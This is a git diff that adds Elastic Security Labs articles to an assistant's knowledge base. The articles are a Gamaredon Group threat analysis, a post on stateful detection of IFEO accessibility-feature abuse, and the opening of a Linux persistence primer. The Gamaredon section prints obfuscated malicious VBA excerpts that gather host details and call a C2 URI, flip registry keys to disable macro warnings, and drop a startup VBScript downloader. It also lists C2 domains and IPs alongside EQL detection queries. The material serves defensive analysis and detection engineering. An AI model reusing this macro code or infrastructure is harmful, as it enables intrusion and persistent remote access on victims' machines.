+| Software               | Microsoft Office Word      |
+| Create Date            | 2019:12:12 11:48:00        |
+| Modify Date            | 2019:12:24 10:30:00        |
+| Code Page              | Windows Cyrillic           |
+| Company                | Reanimator Extreme Edition |
+| Char Count With Spaces | 0                          |
+| Revision Number        | 5                          |
+| Total Edit Time        | 0                          |
+| Words                  | 0                          |
+| Characters             | 0                          |
+| Pages                  | 1                          |
+| Paragraphs             | 1                          |
+| Lines                  | 1                          |
+
+_Figure 7 - Metadata from the remote template (truncated for length)_
+
+While we cannot state with any authority, searching for the Author “ШУРИК” has identified similar TTPs (lure documents with remote template injection) as far back as September of 2019.
+
+## Macro code analysis
+
+The macro code was obfuscated using string concatenation and procedurally generated variables — techniques that are often used to bypass static detection technologies. Upon execution, this code provides reverse shell functionality that allows an adversary access to the victim’s system and capability to access shared resources on their local network. Figure 8 contains an excerpt of the macro that depicts the creation of a reverse shell and some of the system information collected automatically.
+
+```
+Dim NoARzTHy
+NoARzTHy = "Set WShell=CreateObject(""WSc" + "ri" + "pt.S" + "hel" + "l"")"
+Set PWFJWatF = CreateObject("WScr" + "ipt.Ne" + "two" + "rk")
+Dim pbuvwTLK, JzESywut
+Set GGZucIZE = CreateObject("Sc" + "rip" + "ting.Fi" + "leSy" + "stemOb" + "ject")
+pbuvwTLK = GGZucIZE.Drives(Environ("Syst" + "emDri" + "ve")).SerialNumber
+OYTgBXAP = PWFJWatF.ComputerName
+```
+
+_Figure 8 - First 7 lines of macro code from the loaded document template_
+
+Figure 9 shows an excerpt of the same code removing the concatenation.
+
+```
+Dim NoARzTHy
+NoARzTHy = "Set WShell=CreateObject("WScript.Shell")"
+Set PWFJWatF = CreateObject("WScript.Network")
+Dim pbuvwTLK, JzESywut
+Set GGZucIZE = CreateObject("Scripting.FileSystemObject")
+pbuvwTLK = GGZucIZE.Drives(Environ("SystemDrive")).SerialNumber
+OYTgBXAP = PWFJWatF.ComputerName
+```
+
+_Figure 9 - First 7 lines of macro code - Removal of concatenation_
+
+The serial number and hostname of the victim's computer are some of the first pieces of information the VBA collects. They are converted to hexadecimal and included in the reverse shell HTTP request to identify both the implant and the victim. Figure 10 shows off the configuration of the URI request within the macro and Figure 11 represents an example URI.
+
+```
+JzESywut = "h" + "tt" + "p:" + "//l" + "ibcr" + "ash.dd" + "ns.ne" + "t/" & OYTgBXAP & "_" & HFzesifc & "//po" + "sol" + "re" + "boo" + "t.ph" + "p"
+```
+
+_Figure 10 - URI request configuration - Macro_
+
+```
+JzESywut = hxxp://libcrash.ddns[.]net/ENDPOINT1_96L02G3D//posolreboot.php
+```
+
+_Figure 11 - URI request configuration - Example_
+
+By default, Microsoft disables external or untrusted macros by setting key values in the registry at HKCU\Software\Microsoft\Office\(VERSION)\Word\Security\. The first registry modification made by this macro changes the key value of AccessVBOM to 1, effectively bypassing the default setting to enable external or untrusted macros. The second registry modification enables all macros automatically and disables warnings for future macro-enabled objects. Figure 12 represents the macro code for these registry modifications.
+
+```
+FEDzCjgi$ = "HKEY_CURRENT_USER\Software\Microsoft\Office\" & Application.Version & _"\Word\Security\"
+CreateObject("WScript.Shell").RegWrite FEDzCjgi$ & "AccessVBOM", 1, "REG_DWORD"
+CreateObject("WScript.Shell").RegWrite FEDzCjgi$ & "VBAWarnings", 1, "REG_DWORD"
+```
+
+_Figure 12 - Registry modifications found in macro_
+
+The remaining lines of code end up writing a VBScript file and placing it in the user’s startup directory. Figure 13 contains an excerpt of the beginning lines of macro code where the VBScript (security.vbs) is written to disk and placed in the startup folder.
+
+```
+Dim LISPVdZd As Object
+Set LISPVdZd = GGZucIZE.CreateTextFile(FESHWDaD + "\Mi" + "croso" + "ft\Wi" + "ndow" + "s\St" + "art Men" + "u\Pro" + "grams\Sta" + "rtup\secur" + "ity.v" + "b" + "s", True, True)
+```
+
+_Figure 13 - Macro code writing VBScript file (security.vbs)_
+
+Upon rebooting or successfully authenticating to an infected system, the persistent VBScript file is automatically executed and a standard HTTP GET is made with the previously observed URI (Figure 14). If the request is successful, the response body gets stored into another variable. This functionality appears to serve as a downloader that has specific subroutine instructions for reassembling a binary on disk. Figure 14 contains an excerpt of the function used to construct the HTTP GET request.
+
+```
+Function TOGeMFBD(iWotBBKf)
+On Error Resume Next
+Set EXJJrRlN = CreateObject("MSXML2.XMLHTTP")
+With EXJJrRlN
+.Open "GET", iWotBBKf, False
+.send
+End With
+If EXJJrRlN.Status = 200 Then
+TOGeMFBD = EXJJrRlN.ResponseBody
+End If
+End Function
+```
+
+_Figure 14 - GET request (security.vbs)_
+
+During dynamic analysis, analysts identified that the script enters a loop while sending the request. A 0-byte file is created under the infected user’s roaming profile with a procedurally generated file name and text file extension. The file is iteratively written and deleted without the contents changing.
+
+Analysts have not confirmed the purpose of this file, and suspect it is used to reassemble a segmented later-stage implant. Potential reasons to obfuscate this process include evading detection and response solutions.
+
+## Pteranodon update
+
+While doing this research, we observed samples and artifacts that appear to be related to an updated version of the Gamaredon Group’s custom backdoor, known as [Pteranodon](https://attack.mitre.org/software/S0147/). Although we don’t have substantial evidence that Pteranodon is the final payload victims are infected with during this campaign, we assess with moderate confidence that this activity is linked to Gamaredon Group.
+
+Three PE samples were uploaded to VirusTotal last month with each dropping two text files ([ExcelMyMacros.vba](https://www.virustotal.com/gui/file/c4089686965df5e52105b6eac06703aa11c4891695278446370f623d531b505e/details), [wordMacros.vba](https://www.virustotal.com/gui/file/02e6e2bfaaf6e77cfaccadaf26167135c53cf2c934d17c5a83e5bbcadd85b47d/details)). The two text files share several similarities to the VBA macro code found in the remote templates used in this campaign — specifically, the methods of retrieving and hex-encoding the serial number and similar subroutine logic. Figure 15 depicts the VBA macro code from the remote template on the left and the dropped VBA macro code from a known Pteranodon implant on the right.
+
+**VBA from Campaign**
+
+```
+For LfJesrvH = 0 To UBound( IvAPFGDD )" + vbCrLf
+LISPVdZd.Write "IvAPFGDD(LfJesrvH) = Asc( Mid( EaCJFwPc, LfJesrvH + 1, 1 ) )" + vbCrLf
+LISPVdZd.Write "Next" + vbCrLf
+LISPVdZd.Write "GetFEDzCjgi = IvAPFGDD" + vbCrLf
+```
+
+**VBA from Pteranodon**
+
+```
+For i = 0 To UBound( asrrCodes )" + vbCrLf
+NewVDJKpCBSFile.Write " asrrCodes(i) = Asc( Mid( myPassPhrase, i + 1, 1 ) )" + vbCrLf
+NewVDJKpCBSFile.Write " Next" + vbCrLf
+NewVDJKpCBSFile.Write " GetKey = asrrCodes" + vbCrLf
+```
+
+_Figure 15 - Macro comparison - VBA from Campaign (top) vs VBA from Pteranodon (bottom)_
+
+Both text files contained VBA, and had the same functionality for disabling macro warnings, creating a persistent VBScript in the startup folder and establishing connections to C2. What’s interesting with the dropped text files (VBA), is that they show the true variable names used by the developers before their tooling obfuscates the variables. At the time of this writing, each of the four C2 servers (see attached indicators) affiliated with Pteranodon samples were currently active and hosted a network allocated to ASN9123 (TIMEWEB LTD). Macro code associated with the Gamaredon Group campaign targeting Ukraninan officials called back to C2 hosted in the same network.
+
+An interesting change in some of these artifacts appears to be the adoption of .NET. Along with the two text files containing VBA code, there are three dropped DLL’s (Microsoft.Office.Interop.Excel.dll, Microsoft.Office.Interop.Word.dll, Microsoft.Vbe.Interop.dll) and a .NET [sample](https://www.virustotal.com/gui/file/145a61a14ec6d32b105a6279cd943317b41f1d27f21ac64df61bcdd464868edd/details) showing dependencies with these files. Figure 16 shows a hex-encoded reference to one of the VBA files (wordMacros.txt). Based on these observations, it’s intriguing to see Gamaredon Group continue to leverage core functionality of their VBA stager code, but in a new method of execution by using .NET
+
+![](/assets/images/playing-defense-against-gamaredon-group/dotnet_reference.jpg)
+
+_Figure 16 - .NET reference to “wordMacros.txt”_
+
+## Detection crafting
+
+For organizations interested in detecting TTPs discussed in this blog post, detection logic has been provided for the following categories:
+
+### Dynamic DNS
+
+[Dynamic DNS](https://attack.mitre.org/techniques/T1311/) enables adversaries to rapidly provision very large numbers of records that map back to their infrastructure, creating a confusion layer between victims and adversaries. Gamaredon Group exclusively used Dynamic DNS locations for remotely hosted templates, rotating domains consistently, and leveraging separate infrastructure for hosting stagers and templates.
+
+Profiling Dynamic DNS for your enterprise is an amazing way to get started hunting — not just to baseline and build environmental awareness, but also to outright find evil. We will primarily focus on the two Dynamic DNS providers observed in relation to this campaign. If you need inspiration, consider counting up all non-browser processes that made a DNS request to one of these Dynamic DNS providers as shown in Figure 17.
+
+```
+dns where wildcard(query_name, "*.ddns.net", "*.hopto.org", "*.bounceme.net") and
+process_name not in ("chrome.exe","iexplore.exe", "firefox.exe")
+| count process_name, query_name
+```
+
+_Figure 17 - EQL Query - Count of non-browser process to dynamic DNS providers_
+
+Another option examines the processes that most frequently communicate with these providers, and may provide more context regarding how dynamic DNS is used in your environment, or enable an analyst to find signs of other malicious activity.
+
+```
+network where event of
+[dns where wildcard(query_name, "*.ddns.net", "*.hopto.org", "*.bounceme.net")
+| count process_name, total_in_bytes, total_out_bytes
+```
+
+_Figure 18 - EQL query - Network traffic of processes to dynamic DNS providers_
+
+### Template Injection
+
+Spearphishing attachments that utilize [template injection](https://attack.mitre.org/techniques/T1221/) may bypass security controls because they contain no embedded VBA code. The attached document retrieves a remotely hosted template where the malicious VBA code resides. In order to detect this activity dynamically, analyze DNS and network traffic over common protocols (HTTP/HTTPS/SMB) and processes generated by Microsoft Office applications. Enterprise defenders may need to whitelist any legitimate use of remotely hosted templates, or any benign network activity to Microsoft infrastructure. Below is an example EQL query focused on new process creation events from Office products that also made DNS requests outside our whitelist.
+
+```
+sequence by unique_pid
+[process where process_name in ("winword.exe", "excel.exe", "powerpnt.exe")]
+[dns where not wildcard(query_name , "*.microsoft.com", "*.skype.com")]
+```
+
+_Figure 19 - EQL query - DNS traffic from Office applications_
+
+Some enhancements we can use with the previous query is to add a network event to the sequence as well as look for a spawned child process bringing in more context to the detection.
+
+```
+sequence
+[process where process_name in ("winword.exe", "excel.exe", "powerpnt.exe")] by unique_pid
+[dns where not wildcard(query_name, "*.microsoft.com", "*.skype.com")] by unique_pid
+[network where true] by unique_pid
+[process where subtype.create] by unique_ppid
+```
+
+_Figure 20 - EQL query - Network traffic making dynamic DNS requests from Office applications_
+
+If we wanted to tailor a sequence-based detection to the Gamaredon Group activity specifically, we can bring in the previous Dynamic DNS providers, which creates a more restrictive filter.
+
+```
+sequence by unique_pid
+[process where process_name in ("winword.exe", "excel.exe", "powerpnt.exe")]
+[network where event of
+[dns where wildcard(query_name, "*.ddns.net", "*.hopto.org", "*.bounceme.net")]]
+```
+
+_Figure 21 - EQL query - Network traffic making dynamic DNS requests from Office applications_
+
+Across a range of features provided by the Elastic Endpoint, this attack is prevented through different machine-learning technologies to stop advanced threats such as macro-enabled documents and malicious binaries. Along with these protections, we can take nearly any EQL logic and deploy it in prevention mode to completely stop an attack such as in this example with the download and execution of the remote template. Here’s a short clip in action:
+
+<Video vidyard_uuid="Ex2QdtBA8eaHYQFDMK8wWR" />
+
+### Malicious registry configuration
+
+In order for adversaries to be effective in their mission, they often create their own opportunities. In this case, the adversary reconfigured the target endpoint in order to disable macro security warnings and trust future macros automatically. These small changes can end up having larger implications, and defenders can look for them as symptoms of more serious security issues. For example, these same techniques have also been associated with threat groups like APT32 and are leveraged by malware families such as [AgentTesla](https://www.fortinet.com/blog/threat-research/in-depth-analysis-of-net-malware-javaupdtr.html) and [BabyShark](https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/).
+
+This query looks for evidence of the registry modifications that disable warnings for macros and automatically enabling future macros:
+
+```
+registry where registry_data == 1 and wildcard(registry_path,
+"*\\Software\\Microsoft\\Office\\*\\Word\\Security\\AccessVBOM",
+"*\\Software\\Microsoft\\Office\\*\\Word\\Security\\VBAWarnings")
+```
+
+_Figure 22 - EQL query - Registry modifications around disabling macro security features_
+
+That would function perfectly well as a standalone detection, but EQL allows us to look for both the registry modification and template injection techniques in this example query:
+
+```
+sequence by unique_pid
+[process where process_name in ("winword.exe", "excel.exe", "powerpnt.exe")]
+[registry where registry_data == 1 and wildcard(registry_path,
+"*\\Software\\Microsoft\\Office\\*\\Word\\Security\\AccessVBOM",
+"*\\Software\\Microsoft\\Office\\*\\Word\\Security\\VBAWarnings")]
+[registry where registry_data == 1 and wildcard(registry_path,
+"*\\Software\\Microsoft\\Office\\*\\Word\\Security\\AccessVBOM",
+"*\\Software\\Microsoft\\Office\\*\\Word\\Security\\VBAWarnings")]
+```
+
+_Figure 23 - EQL query - Registry modifications around disabling macro security features_
+
+### Persistence startup
+
+Gamaredon Group leveraged both malicious Windows shortcut files and script objects written to the [Startup folder](https://attack.mitre.org/techniques/T1060/) for persistence. This technique is very effective in spite of its simplicity and continues to be popular among adversaries. One of the first places to start building detection logic would be to inquire about processes that write files to the startup folder.
+
+```
+file where subtype.create
+and (
+file_path == "*\\Programs\\Startup\\*.lnk" or
+file_path == "*\\Programs\\Startup\\*.vbs"
+)
+| count process_name, file_path, user_name
+```
+
+_Figure 24 - EQL query - Monitoring file writes to startup folder_
+
+To take it a bit further, we can also customize detection logic to include the VBScript execution at logon. This is a great example for building a sequenced-based signal, as we will track the adversary’s activity over an extended period of time — such as 90 days. Once the machine is rebooted or the user logs back in, an alert can be generated when WScript executes the VBScript file at startup.
+
+```
+sequence with maxspan=90d
+[file where subtype.create and file_path == "*\\Programs\\Startup\\*.vbs"]
+[process where subtype.create and parent_process_name=="explorer.exe" and
+process_name == “wscript.exe” and command_line == "*\\Programs\\Startup\\*"]
+```
+
+_Figure 25 - EQL query - Monitoring execution of startup processes_
+
+## Conclusion
+
+In this post, we reviewed recent campaign TTPs tied to an adversary known publicly as Gamaredon Group. This group is likely to have been active since at least 2013 and has engaged in an ongoing campaign against Ukraine at the time of this writing. We highlighted some of their current techniques such as template injection and the use of Dynamic DNS providers, the macro code found in a recent sample, and updates to their custom backdoor known as Pteranodon. By using [EQL](https://www.elastic.co/blog/introducing-event-query-language), we also shared hunting and detection strategies around four specific techniques used by Gamaredon Group.
+
+We hope that by sharing some of these insights and queries, we can help raise awareness and continue to focus on protecting the world's data from attacks. To enable organizations further, we’ve added all the Indicators of Compromise (IOCs) below and added the queries in this post into the [EQLLib repository](https://eqllib.readthedocs.io/en/latest/analytics.html).
+
+Interested in using Elastic Security? Try [Elastic SIEM](https://www.elastic.co/siem) for free.
+
+Plus, [EQL support is being added to Elasticsearch](https://github.com/elastic/elasticsearch/issues/49581)!
+
+## Indicators of Compromise (IOCs)
+
+|                                           |                                                                    |
+| ----------------------------------------- | ------------------------------------------------------------------ |
+| Lure Document SHA-256                     | 86e0701349903105b0c346df9485dd59d85dd9463c2bee46d974ea1b1d7059d4   |
+| Remote Template (pos.dot) SHA-256         | feb0596e9735e03ae929d9b5ee862da19e16e5cdf57dd2a795205e591a55940f   |
+| Remote Template from Lure Document Domain | document-out[.]hopto[.]org/pos[.]dot                               |
+| Remote Template Hosting IP                | 141[.]8[.]195[.]60                                                 |
+| Remote Template Hosting IP                | 141[.]8[.]192[.]153                                                |
+| System Information Upload IP              | 188[.]225[.]25[.]50                                                |
+| System Information Upload URI             | libcrash.ddns[.]net/\{Computername_SerialNumber\}//posolreboot.php |
+| ExcelMyMacros.vba SHA-256                 | c4089686965df5e52105b6eac06703aa11c4891695278446370f623d531b505e   |
+| wordMacros.vba SHA-256                    | 02e6e2bfaaf6e77cfaccadaf26167135c53cf2c934d17c5a83e5bbcadd85b47d   |
+| ExcelMyMacros.txt SHA-256                 | 2f310c5b16620d9f6e5d93db52607f21040b4829aa6110e22ac55fab659e9fa1   |
+| Pteranodon SHA-256                        | c1524a4573bc6acbe59e559c2596975c657ae6bbc0b64f943fffca663b98a95f   |
+| Pteranodon SHA-256                        | 145a61a14ec6d32b105a6279cd943317b41f1d27f21ac64df61bcdd464868edd   |
+| Pteranodon Domain                         | beercraft[.]space                                                  |
+| Pteranodon Domain                         | skymage[.]fun                                                      |
+| Pteranodon Domain                         | masseffect[.]space                                                 |
+| Pteranodon Domain                         | masseffect[.]website                                               |
+| Pteranodon IP                             | 185[.]200[.]241[.]88                                               |
+| Pteranodon IP                             | 188[.]225[.]46[.]94                                                |
+
+## References
+
+1. [https://www.anomali.com/resources/whitepapers/malicious-activity-aligning-with-gamaredon-ttps-targets-ukraine](https://www.anomali.com/resources/whitepapers/malicious-activity-aligning-with-gamaredon-ttps-targets-ukraine)
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/practical_security_engineering_stateful_detection.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/practical_security_engineering_stateful_detection.md
new file mode 100644
index 0000000000000..9b3e940a694a1
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/practical_security_engineering_stateful_detection.md
@@ -0,0 +1,161 @@
+---
+title: "Practical security engineering: Stateful detection"
+slug: "practical-security-engineering-stateful-detection"
+date: "2022-06-01"
+description: "By formalizing stateful detection in your rules, as well as your engineering process, you increase your detection coverage over future and past matches. In this blog post, learn why stateful detection is an important concept to implement."
+author:
+  - slug: samir-bousseaden
+image: "blog-thumb-digital-shield.jpg"
+category:
+  - slug: security-research
+---
+
+Detection engineering at Elastic is both a set of reliable principles — or methodologies — and a collection of effective tools. In this series, we’ll share some of the foundational concepts that we’ve discovered over time to deliver resilient detection logic.
+
+In this blog post, we will share a concept we call **stateful detection** and explain why it's important for detection.
+
+## Detection states
+
+The quickest way to get started may not always be the best, and new analysts tend to jump right into the post-exploitation details, mapping available data sources and logic fragments. Few consider that the state of a technique may influence visibility. The following three states illustrate one operations-focused approach:
+
+- **Creation state** : Related to detecting suspicious or critical activity at the time of configuration or preparation (e.g., creation or modification of a new Run key registry value to detect new persistent programs)
+- **Runtime state:** Related to detecting suspicious or critical activity at the moment of execution, which may be the result of an automated process (e.g., after a program was added to the HKLM RunOnce key, it will be executed as a child process of RunOnce.exe at system startup)
+- **Cleanup state:** A special kind of runtime state related to detecting active and passive methods of covering tracks (files, registry deletion, and process termination are examples of needed telemetry; e.g., delete startup entry)
+
+Many organizations tasked with creating detection logic focus on a given event creation state, though the following limitations are often overlooked.
+
+- There will be detection gaps for known tactics, techniques, and procedures (TTPs) at execution. It’s likely you’re dealing with creation-state detection logic built for these TTPs, meaning you’re only finding this behavior after the fact.
+- There will be detection gaps for techniques used by attackers who are diligent at tidying up their presence, as security operations tend to focus on detecting techniques in the earliest stages of an intrusion.
+- The required telemetry, data, and logic for one technique may be different for each state and require enabling new telemetry or changing existing configurations.
+
+The practical application of this concept is most effective for detecting techniques in tactic categories that focus on predictable outcomes such as persistence, defense evasion (e.g., abnormal memory type and protection for code injection), and command and control (unusual process network traffic).
+
+To make this concept clearer, let's explore an example of designing detection logic in the [Persistence](https://attack.mitre.org/tactics/TA0003/) tactic category using [T1015 - Accessibility Features](https://attack.mitre.org/techniques/T1015/). Suppose an attacker has already enabled a backdoor to execute using this technique (via Image File Execution Options - Debugger registry value) months or weeks before you’ve implemented a detection for it.
+
+![1-stateful-detection-engineering-blog-depiction-file-execution.jpg](/assets/images/practical-security-engineering-stateful-detection/1-stateful-detection-engineering-blog-depiction-file-execution.jpg)
+
+_Figure 1: Depiction of image file execution options debugger abuse (1)_
+
+Image File Execution Options (IFEO) are used for debugging legitimate applications, and can be abused by an attacker with at least local administrator privileges to execute a malicious program (instead of a legitimate one) via the Debugger setting. As shown in Figure 2, cmd.exe will be executed every time the on-screen keyboard (osk.exe) is invoked, providing the attacker a system shell backdoor.
+
+![2-stateful-detection-engineering-blog-depiction-2-file_execution.jpg](/assets/images/practical-security-engineering-stateful-detection/2-stateful-detection-engineering-blog-depiction-2-file_execution.jpg)
+
+_Figure 2: Depiction of image file execution options debugger abuse (2)_
+
+## **Creation state**
+
+At the time of creation, while configuring the Debugger value, detection primarily consists of monitoring a filtered subset of the registry for new references to accessibility features (e.g., osk.exe for the On-Screen Keyboard) and the registry value name Debugger. This technique is also effective for other accessibility features depicted in Figure 3.
+
+![3-stateful-detection-engineering-blog-accessibility-features.png](/assets/images/practical-security-engineering-stateful-detection/3-stateful-detection-engineering-blog-accessibility-features.png)
+
+_Figure 3: Accessibility features processes_
+
+[EQL](https://www.elastic.co/guide/en/elasticsearch/reference/master/eql.html) is a language we can use to broadly describe **creation-state** detection events for any technique. Figure 4 depicts an EQL rule demonstrating one example that detects [accessibility features](https://attack.mitre.org/techniques/T1015/) using IFEO.
+
+![4-stateful-detection-engineering-blog-t1015.png](/assets/images/practical-security-engineering-stateful-detection/4-stateful-detection-engineering-blog-t1015.png)
+
+_Figure 4: T1015 - IFEO creation state EQL example_
+
+## **Runtime state**
+
+At the time of creation, that kind of EQL logic will help to detect the technique, but what if the configuration happened _weeks or months ago_? A different kind of EQL expression is better suited for detecting the technique in a runtime state. It begins with a little focused research.
+
+It can help to adopt a structured approach to researching this state:
+
+1. Understand normal execution flow: Manually execute each accessibility feature, recording normal process lineage, attributes, and execution flow
+
+1. Document consistent parent process, process command line arguments, privilege characteristics, and process ancestry
+1. Identify hijack opportunities
+
+1. As an example, while it may be possible to configure a debugger for osk.exe, is it possible to configure one for utilman.exe, the parent of osk.exe?
+1. Hunt unique anomalies
+
+1. Identify observable characteristics of IFEO Debugger hijacking to differentiate between legitimate and malicious use of this technique (e.g., abnormal child of winlogon.exe could be caused by code injection and unrelated to T1015)
+1. Create a **runtime-state** detection EQL rule, evaluate potential fixes to any **creation-state** detection EQL logic
+
+Let’s dig into each of these steps so that you can better understand how this process can be adapted to work with your own team.
+
+### **Understand normal execution flow**
+
+For osk.exe, sethc.exe, magnify.exe, and narrator.exe, the expected parent process is utilman.exe. Figure 5 depicts a visualization of the normal process-tree for the on-screen keyboard accessibility feature.
+
+![5-stateful-detection-engineering-blog-on-screen-keyboard.jpg](/assets/images/practical-security-engineering-stateful-detection/5-stateful-detection-engineering-blog-on-screen-keyboard.jpg)
+
+_Figure 5: Example of normal on-screen keyboard execution_
+
+For sethc.exe (Sticky Keys), which can be invoked by pressing the SHIFT key five times, expected parent processes are ATBroker.exe, utilman.exe, and winlogon.exe. For Displayswitch.exe, a similarly debuggable accessibility feature that can be invoked by pressing the WIN and P keys, expected parents are svchost.exe (DCOM service not useful in the context of T1015) and winlogon.exe.
+
+Understanding **normal** execution will be helpful as you begin to explore less-expected execution. If we jumped right to [MITRE ATT&CK®](https://attack.mitre.org/) before analyzing normal behavior and then tried to write a rule, we wouldn’t have some of the essential context and our logic would be less effective.
+
+### **Identifying hijacking possibilities**
+
+While we have our benevolent researcher hats on, let’s consider how we might abuse this kind of normal execution. We can infer at least a few options to start with:
+
+- Attempt to abuse execution of an accessibility application (e.g., osk.exe, magnify.exe, narrator.exe) by configuring a debugger IFEO flag
+- Attempt to abuse execution of an expected non system critical parent process (e.g., utilman.exe, atbroker.exe), which is a bit more of a shot in the dark
+
+That’s a pretty narrowly scoped set of options for now; directly abusing accessibility applications is straightforward and a good place to start.
+
+### **Hunting unique anomalies**
+
+We need to configure our own IFEO Debugger value for each of the known accessibility feature applications, which helps highlight noteworthy toolmarks. The table below depicts commandline arguments and process ancestry observed when our benign IFEO Debugger (set to cmd.exe) was triggered. There are some clear patterns in the command_line and parent_process_path values, as shown in Figure 6.
+
+![6-stateful-detection-engineering-blog-IFEO-runtime.jpg](/assets/images/practical-security-engineering-stateful-detection/6-stateful-detection-engineering-blog-IFEO-runtime.jpg)
+
+_Figure 6: T1015 - IFEO Runtime-State Anomalies (1)_
+
+This pattern can be translated into the following **runtime-state** detection, depicted using EQL in Figure 7.
+
+![7-stateful-detection-engineering-blog-IFEO-state-detection.jpg](/assets/images/practical-security-engineering-stateful-detection/7-stateful-detection-engineering-blog-IFEO-state-detection.jpg)
+
+_Figure 7: T1015 - IFEO Runtime-State Detection EQL (1)_
+
+Now that we’ve covered the direct abuse, what happens when we try to manipulate one of the expected parent processes? Figure 8 contains a few attempts at abusing the expected parent processes of accessibility features.
+
+![8-stateful-detection-engineering-blog-IFEO-runtime-state.jpg](/assets/images/practical-security-engineering-stateful-detection/8-stateful-detection-engineering-blog-IFEO-runtime-state.jpg)
+
+_Figure 8: T1015 - IFEO Runtime State Anomalies (2)_
+
+As is illustrated in the previous figure, the same anomaly type can be translated to the **runtime-state** detection EQL in Figure 9.
+
+![9-stateful-detection-engineering-blog-IFEO-runtime-2.png](/assets/images/practical-security-engineering-stateful-detection/9-stateful-detection-engineering-blog-IFEO-runtime-2.png)
+
+_Figure 9: T1015 - IFEO runtime-state detection EQL (2)_
+
+**Tip:** Be careful about making exceptions too broad in hunting queries. Favor PE information over process metadata when you can, and join that with signing status for low-hanging fruit.
+
+Figure 10 depicts the graphical timeline of a **runtime-state** alert, which can detect the use of an existing T1015 backdoor.
+
+![10-stateful-detection-engineering-blog-keyboard-execution.jpg](/assets/images/practical-security-engineering-stateful-detection/10-stateful-detection-engineering-blog-keyboard-execution.jpg)
+
+_Figure 10: T1015 - IFEO runtime-state alert example_
+
+## **Cleanup state**
+
+Detection logic for this state is often the opposite of the **creation-state** logic. Below is an example for osk.exe IFEO key deletion as logged by [sysmon](https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon).
+
+![11-stateful-detection-engineering-blog-IFEO-cleanup-state.jpg](/assets/images/practical-security-engineering-stateful-detection/11-stateful-detection-engineering-blog-IFEO-cleanup-state.jpg)
+
+_Figure 11: T1015 - IFEO cleanup-state sysmon event example_
+
+What significant lessons should we take away?
+
+- **runtime-state** detection requires different data (e.g., enable telemetry for child processes of utilman.exe and winlogon.exe in your sysmon configuration, use commandline value to differentiate between abnormal child processes and T1015 unique artifacts)
+- **cleanup-state** detection requires different data (e.g., registry deletion, process termination)
+- Adjust **creation-state** EQL rule by adding atbroker.exe and utilman.exe (can be abused as well)
+
+## **Beyond baseline**
+
+For the same technique, other than monitoring files overwrite ( **creation-state** ) and process masquerading as accessibility features ( **runtime-state** ), we can also hunt and alert ( **runtime-state** ) proactively on any unusual child processes (or suspicious non-Microsoft image loads to detect [potential Image hijack](https://iwantmore.pizza/posts/arbitrary-write-accessibility-tools.html)) of the accessibility features processes (osk.exe, narrator.exe, magnify.exe, sethc.exe, and DisplaySwitch.exe) — the majority of which are **childless** processes.
+
+![12-stateful-detection-engineering-blog-unusual-accessibility.jpg](/assets/images/practical-security-engineering-stateful-detection/12-stateful-detection-engineering-blog-unusual-accessibility.jpg)
+
+_Figure 12: T1015 - unusual accessibility feature child process_
+
+## **Conclusion**
+
+When assessing existing or designing new detection logic, always ask yourself how a specific technique/procedure manifests itself at the three different states before marking a specific attack procedure as covered. This impacts the type of data sources and the logic details you will need to build state resilient detections
+
+Actively scanning for existing matches to creation-state logic is an option (often used during compromise assessment), but this is not applicable to near real-time detection. It’s not always applicable to create detection for specific states (e.g., high performance impact, difficulty to obtain right telemetry). By formalizing the stateful-detection concept in your rules, as well as your use cases engineering process, you increase your detection coverage in time (future and past matches).
+
+Want to give [Elastic Security](https://www.elastic.co/security) a spin? Try it free today, or experience our latest version on [Elasticsearch Service](https://www.elastic.co/elasticsearch/service) on Elastic Cloud.
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/primer_on_persistence_mechanisms.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/primer_on_persistence_mechanisms.md
new file mode 100644
index 0000000000000..2c6de2d27fd7f
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/primer_on_persistence_mechanisms.md
@@ -0,0 +1,800 @@
+---
+title: "Linux Detection Engineering - A primer on persistence mechanisms"
+slug: "primer-on-persistence-mechanisms"
+date: "2024-08-21"
+subtitle: "A walkthrough on how threat actors establish persistence on Linux systems and how to hunt for these techniques."
+description: "In this second part of the Linux Detection Engineering series, we map multiple Linux persistence mechanisms to the MITRE ATT&CK framework, explain how they work, and how to detect them."
+author:
+  - slug: ruben-groenewoud
+image: "primer-on-persistence-mechanisms.jpg"
+category:
+  - slug: detection-science
+tags:
+  - linux
+  - persistence
+---
+
+## Introduction
+
+In this second part of the Linux Detection Engineering series, we'll examine Linux persistence mechanisms in detail, starting with common or straightforward methods and moving toward more complex or obscure techniques. The goal is to educate defenders and security researchers on the foundational aspects of Linux persistence techniques by examining both trivial and more complicated methods, understanding how these methods work, how to hunt for them, and how to develop effective detection strategies.
+
+For those who missed the first part, "Linux Detection Engineering with Auditd", it can be found [here](https://www.elastic.co/security-labs/linux-detection-engineering-with-auditd).
+
+For this installment, we'll set up the persistence mechanisms, analyze the logs, and observe the potential detection opportunities. To aid in this process, we’re sharing [PANIX](https://github.com/Aegrah/PANIX), a Linux persistence tool developed by Ruben Groenewoud of Elastic Security. PANIX simplifies and customizes persistence setup to test your detections.
+
+By the end of this article, you'll have a solid understanding of each persistence mechanism we describe, including:
+* How it works (theory)
+* How to set it up (practice)
+* How to detect it (SIEM and Endpoint rules)
+* How to hunt for it (ES|QL and OSQuery hunts)
+
+Step into the world of Linux persistence with us, it’s fun!
+
+## What is persistence?
+
+Let’s start with the basics. [Persistence](https://attack.mitre.org/tactics/TA0003/) refers to an attacker's ability to maintain a foothold in a compromised system or network even after reboots, password changes, or other attempts to remove them.
+
+Persistence is crucial for attackers, ensuring extended access to the target environment. This enables them to gather intelligence, understand the environment, move laterally through the network, and work towards achieving their objectives.
+
+Given that most malware attempts to establish some form of persistence automatically, this phase is critical for defenders to understand. Ideally, attacks should be detected and prevented during initial access, but this is not always possible. Many malware samples also leverage multiple persistence techniques to ensure continued access. Notably, these persistence mechanisms can often be detected with robust defenses in place.
+
+Even if an attack is detected, the initial access vector is patched and mitigated, but any leftover persistence mechanism can allow the attackers to regain access and resume their operations. Therefore, it's essential to monitor the establishment of some persistence mechanisms close to real time and hunt others regularly.
+
